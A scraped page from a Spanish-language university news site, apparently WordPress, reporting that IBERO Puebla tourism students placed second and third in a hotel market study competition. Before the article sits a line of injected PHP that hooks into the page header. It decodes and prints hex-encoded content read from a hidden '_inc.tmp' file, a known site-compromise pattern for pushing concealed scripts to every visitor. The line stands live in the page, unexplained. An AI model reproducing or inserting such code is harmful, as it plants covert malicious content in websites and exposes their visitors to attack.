if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Estudiantes de IBERO Puebla participaron en el México Market Study Competition – La Opinión Universitaria La Opinión Universitaria
Menu

Estudiantes de IBERO Puebla participaron en el México Market Study Competition

 

* Obtuvieron el segundo lugar en el concurso gracias a su estudio detallado del mercado hotelero

 

Estudiantes de la Licenciatura en Administración Turística y de la Hospitalidad de la IBERO Puebla participaron en el Coloquio de Emprendedores Turísticos y en el Concurso STR & CONPEHT MexicoStudent Market Study, realizados por el Capítulo México de la CONPEHT con sede en la IBERO Ciudad de México.

Las y los alumnos tuvieron la oportunidad de aplicar sus conocimientos y habilidades analíticas, exponiendo un estudio de mercado hotelero ante un consejo de profesores, profesionales de la industria y reclutadores.

Dicha muestra se realizó a través de datos confidenciales proporcionados por las compañías Smith Travel Research (STR) y Share Center, con los cuales los equipos estudiantiles desarrollaron un estudio de la oferta y demanda de distintas zonas de oportunidad turística, indicando el posible desempeño de la industria hotelera en determinadas áreas.

Los estudiantes Francisco Azpiri Gómez, Pedro González Bustos, Sarahí Juárez Morales y Garazi Santesteban obtuvieron el segundo lugar en el concurso gracias a su estudio detallado del mercado hotelero en la zona metropolitana de Puebla.

De igual manera, los alumnos Dolores de María Urrutia Guarnero, María José Romero Romero, Constanza Trespalacios Sánchez y Juan Luis Chantres Porras obtuvieron el tercer lugar por su análisis del mercado hotelero en la península de Yucatán.

Durante la realización del concurso, se llevó a cabo el Coloquio de Emprendedores Turísticos, en el cual las estudiantes Valeria Enríquez Zamora y Meredith Hernández Degollado participaron en la elaboración de dos proyectos de emprendimiento turístico, tomando en cuenta al desarrollo sostenible como mecánica

  • Tweets recientes